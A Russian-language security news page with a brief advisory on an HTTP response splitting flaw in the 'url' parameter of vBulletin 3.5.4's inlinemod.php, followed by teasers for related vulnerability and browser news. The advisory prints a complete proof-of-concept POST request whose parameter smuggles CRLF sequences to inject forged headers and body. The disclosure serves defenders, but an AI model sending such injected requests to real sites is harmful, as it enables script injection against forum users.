Уязвимость HTTP Response Splitting в vBulletin

Программа: vBulletin 3.5.4
Опасность: Низкая
Наличие эксплоита: Да .
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

POST /vb354/inlinemod.php HTTP/1.0
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
Content-Length: 93
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.com
Content-Type: application/x-www-form-urlencoded
do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0aHacked!%0d%0a%0d%0a


Уязвимость обнаружил Агиевич Игорь aka Shanker (shanker@mail.ru)

URL производителя: http://www.vbulletin.com

Поделиться в соц. сетях

mailru Уязвимость HTTP Response Splitting в vBulletin
facebook Уязвимость HTTP Response Splitting в vBulletin
odnoklassniki Уязвимость HTTP Response Splitting в vBulletin
livejournal Уязвимость HTTP Response Splitting в vBulletin
googlebuzz Уязвимость HTTP Response Splitting в vBulletin

Также рекомендуем:

  1. Вышла финальная версия MozBackup 1.4.4 MozBackup – утилита для создания резервных копий для различных программ Mozilla.Программа может создавать и восстанавливать из ранее созданных копий данные для программ Mozilla Firefox, Mozilla Thunderbird, SeaMonkey, Mozilla Suite и Netscape следующих версий:. Firefox 1.0 – 2.0 Alpha 1 Thunderbird 1.0 – 1.5.0.x SeaMonkey 1.0a – 1.0.x Mozilla Suite 1.7 – 1.7.x Netscape 7.x. Среди [...]...
  2. Отказ в обслуживании в Opera Программа: Opera 9, возможно более ранние версии.Опасность: СредняяНаличие эксплоита: Да. Описание:Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует из-за ошибки при обработке каскадных стилей. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать отказ в обслуживании браузера. Пример: function mystyle() {    if (fake.document.styleSheets.length == 1 )    {      f [...]...
  3. Уязвимость при обработке анимированного курсора в Microsoft Windows Программа:Microsoft Windows 2000 Datacenter ServerMicrosoft Windows 2000 Advanced ServerMicrosoft Windows 2000 ProfessionalMicrosoft Windows 2000 ServerMicrosoft Windows XP Home EditionMicrosoft Windows XP ProfessionalMicrosoft Windows Server 2003 Datacenter EditionMicrosoft Windows Server 2003 Enterprise EditionMicrosoft Windows Server 2003 Standard EditionMicrosoft Windows Server 2003 Web EditionMicrosoft Windows Storage Server 2003Microsoft Windows Vista. Опасность: Критическая Наличие эксплоита: Нет Описание:Уязвимость позволяет [...]...
  4. Ловушка для спам-бота Многие спам-боты, чтобы скрыть свои реальные имена (названия), которые легко отследить по записи user_agent, изменяют эту запись, меняя её на записи разных браузеров (например: «mozilla/4.0 (compatible; msie 5.5; windows nt 5.0)» и так далее). Также эти боты игнорируют стандарты записей для файла robots.txt (описание стандарта Вы можете прочесть здесь http://www.robotstxt.org/wc/exclusion.html robots.txt standard).. Можно, конечно, пойти [...]...
  5. Еще одна уязвимость в Microsoft IE На днях компания Microsoft сообщила, что в популярном браузере Internet Explorer обнаружилась новая открытая уязвимость. Эта проблема приводит к утечке информации, если на компьютере пользователя установлена операционная система Windows XP, а так же отключен защищенный режим в Internet Explorer. Суть этой уязвимости в том, что она открывает доступ к любому файлу на компьютере пользователя. . [...]...
  6. Множественные уязвимости в Mozilla Firefox Программа: Mozilla Firefox до версии 1.5.0.7. Опасность: Критическая Наличие эксплоита: нет Описание: Обнаруженные уязвимости позволяют злоумышленнику выполнить нападение “человек по середине”, межсайтовый скриптинг, спуфинг и потенциально скомпрометировать систему пользователя. 1. Переполнение буфера в обработке JavaScript регулярных выражений позволяет злоумышленнику выполнить произвольный код на целевой системе. 2. Механизм автообновления использует SSL для безопасного общения. Если пользователь [...]...
  7. Выпущен большой релиз Google Chrome v4 под Windows Компанией Google представлена новая версия браузера Chrome в Windows-редакции с поддержкой расширений и синхронизации закладок. Система расширений — представляет собой одну из наиболее часто запрашиваемых и востребованных пользователями из всего многообразия разрабатываемых возможностей Chrome. Практически, это является данью Mozilla и ее браузеру Firefox. За счет плагинов браузер обогатился большим количеством новых функций. Девелоперы высказываются о [...]...
  8. Критическая уязвимость содержится в Windows 7 Microsoft сделала предупреждение пользователям, о том, что новая версия ОС Windows 7 весьма уязвима, причем защиты от уязвимости пока нет. Однако, защитить себя от уязвимости можно отключением двух сетевых портов на межсетевом экране.. В бюллетене безопасности компании публикуется, что Microsoft признает проблему, кроящуюся в сетевом обмене файлами SMB (Short Message Block). Она затрагивает операционную систему [...]...
  9. Яндекс и доп. ссылки для мультиязычных сайтов Яндекс обзавелся механизмом вывода сайтов, имеющих несколько версий на различных языках, в SERP. Если Яндекс «понимает», что найденный текст – перевод исходного с другого языка, то результат поиска выдает под заголовком найденной ссылку на страницу с переведенным документом.. Бывает и так, что сайт имеет два идентичных текста на разных языках. В этом случае адрес страницы [...]...
  10. Найдена уязвимость в Firefox 3.6 Компания Mozilla Foundation в срочном порядке выпустила в свет внеочередной патч для устранения уязвимости в Firefox 3.6.. В середине прошлой недели появилась уязвимость, которая позволяла злоумышленникам внедрить вредоносный код на компьютер пользователя, когда те посещали зараженные сайты. Эту «дыру» в браузере обнаружила компания Secunia, а представители Mozilla сразу же заверили, что уязвимость будет очень быстро [...]...
  11. Microsoft удивляет пользователей "синим экраном смерти" На веб-сайте корпорации Microsoft появилась страница, посвященная весьма необычной утилите – небольшому скринсейверу BlueScreen, который имитирует возникновение самых разнообразных системных ошибок.. BlueScreen может работать на компьютерах с операционными системами Windows NT 4.0, Windows 2000, Windows XP, Windows Server 2003 и Windows 9x (потребуется DirectX). Программа имитирует так называемые «синие экраны смерти» (blue screens of death), [...]...
  12. Отказ в обслуживании в Mozilla Firefox Программа: Mozilla Firefox 1.5.0.4 и более ранние версии. . Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует из-за ошибки при обработке тега . Удаленный пользователь может с помощью специально сформированной Web страницы вызвать отказ в обслуживании браузера и потребить большое количество ресурсов на системе. URL производителя: [...]...
  13. Увидела свет экспериментальная версия Google Chrome В блоге сообщества разработчиков Chromium появилось сообщение о презентации компанией Google экспериментальной версии браузера Chrome Canary Build.. В экспериментальной версии будут представлены все новинки от команды разработчиков Google Chrome. Обновление версии, в отличие от бета-версии и версии для разработчиков, которая обновляется регулярно – раз в неделю, будет производиться непосредственно после выхода таких новинок. Расчет компании [...]...
  14. Firefox 4 и система автоматического обновления Mozilla решила обеспечить новую версию браузера Firefox 4 системой автоматического обновления. Теперь браузер в фоновом режиме, не выводя запросов и предупреждений пользователю, будет скачивать и устанавливать изменения, исправления и дополнения. В качестве единственного средства, которое будет информировать пользователя о ходе обновления, предусмотрена специальная строка статуса.. Средством автоматического обновления будет снабжена версия Firefox 4 для ОС [...]...
  15. Еще один троян по наши души Вредоносная программа Exploit-WMF (Windows Meta File) использует уже известную дыру в Windows-системах, чтобы подбрасывать на зараженные компьютеры шпионские и рекламные программы или превращать их в зомби, сообщает компания Symantec.. По словам пресс-службы Symantec, на которую ссылается CNET, червь использует уязвимость в WMF-библиотеке Windows, чтобы подкинуть на атакуемый компьютер небольшую программу-установщика, которая уже скачивает из Сети [...]...

Комментарии запрещены.